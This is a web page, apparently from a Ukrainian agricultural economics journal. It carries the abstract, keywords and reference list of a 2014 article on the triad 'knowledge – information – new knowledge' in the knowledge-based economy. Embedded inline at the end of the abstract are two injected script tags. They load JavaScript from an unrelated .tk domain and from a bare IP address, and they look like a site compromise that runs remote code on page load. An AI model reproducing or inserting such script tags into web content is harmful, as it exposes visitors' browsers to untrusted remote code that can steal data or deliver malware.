ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 65.011.46
Проблеми економічної теорії

Тріада «знання - інформація - нові знання» як базовий вектор розвитку сучасного суспільства / Уткіна Г. А. // Економіка АПК. - 2014. - № 4 - С. 65

Важливою тенденцією розвитку світової економіки на сучасному етапі є процес інтелектуалізації та формування на цій основі суспільства, заснованого на знаннях, в якому економічний добробут визначається високими технологіями, інноваційними можливостями й рівнем інтелектуального розвитку суспільства. Поступово здійснюється перехід до інноваційної моделі економічного росту. Нині всі види продукції створюються на основі використання різних наявних знань людства, отже закономірно з’являється необхідність систематичного поповнення системних знань завдяки інформаційно-телекомунікаційним технологіям. Процес побудови економіки знань тісно переплетений із глобалізацією світової економіки. Знання є найбільш автономним, портативним та швидко доступним фактором виробництва, що передбачає їхній глобальний аспект. У зв’язку з цим виникає потреба у з’ясуванні змісту низки понять, пов’язаних із процесом одержання та застосування знань, а саме: «наукові знання», «інформація», тріада «знання - інформація - нові знання». Рис.: 1. Бібліогр.: 15.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: наука, наукові знання, структура наукового знання, динаміка наукового знання, інформація, синергетика, інформаційне суспільство

Список використаних джерел

 1. Веккер Л.М. Восприятие и основы его моделирования / Л.М. Веккер. — Л.: Изд-во Ленинградского университета, 1964. — 194 с.
 2. Гейтс Б. Бизнес со скоростью мысли/ Б. Гейтс. — М., 2001. – 248 с.
 3. Peter Drucker. Peter Drucker on the Profession of Management / Peter Drucker. — М., 2006. – 143 с.
 4. Manuel Сastells. The End of the Millennium, The Information Age: Economy, Society and Culture, Vol. / Manuel Сastells — М., 2000. — 608 с.
 5. Никифоров А.Л. Анализ понятия «знание»:подходы и проблемы/ А.Л. Никифоров //Эпистемология & философия науки. – 2009. — № 3. — С.61-73.
 6. Термінологічний словник з інформатики: для студ. усіх спец. і усіх форм навч. / Сумський держ. ун-т . — Суми : Вид-во СумДУ, 2002. — 208 с.
 7. Федулова Л.І. Концептуальні засади економіки знань / Л.І. Федулова // Економічна теорія. – 2008. —№ 2. — С. 37-59.
 8. Философия науки: учеб. пособие для вузов; под.ред. С.А.Лебедева [Изд.5-е, перераб., доп.] — М.:Академический проект; Альма Матер, 2007. — 732 с.
 9. Философия: Энциклопедический словарь; под ред. А.А. Ивина. — М.: Гардарики, 2004. — 1072 с.
 10. Ходжсон Дж. Социально-экономические последствия прогресса знаний и нарастания сложности / Дж. Ходжсон // Вопросы экономики. – 2001. — № 8. — С. 32-45.
 11. Чечнев Б.А. Информация как проблема знания: препринт / Б.А. Чечнев. — К., 1989.
 12. Шапиро С.Б. К вопросу об информации и научно-информационной деятельности/ С.Б.Шапиро. — Харьков, 1997. – № 2. — С. 162.
 13. Joseph Schumpeter. Capitalism, Socialism and Democracy / Joseph Schumpeter, translated and edited by B. S.Avtonomova – Moscow: Economy, 1995. – 540 p.
 14. Joseph Schumpeter. The Theory of Economic Development / Schumpeter; translated and edited by B. S.Avtonomova – Moscow: Economy, 1982. – 450 p.
 15. Юридична енциклопедія: в 6 т. // Редкол.: Ю.С. Шемшученко (голова редкол.) та ін. — К. : “Укр. енцикл.”, 1998. — С. 717.
Читати статтю: 14_04_65-69.pdf
Читати переклад статті: 1404utkina.pdf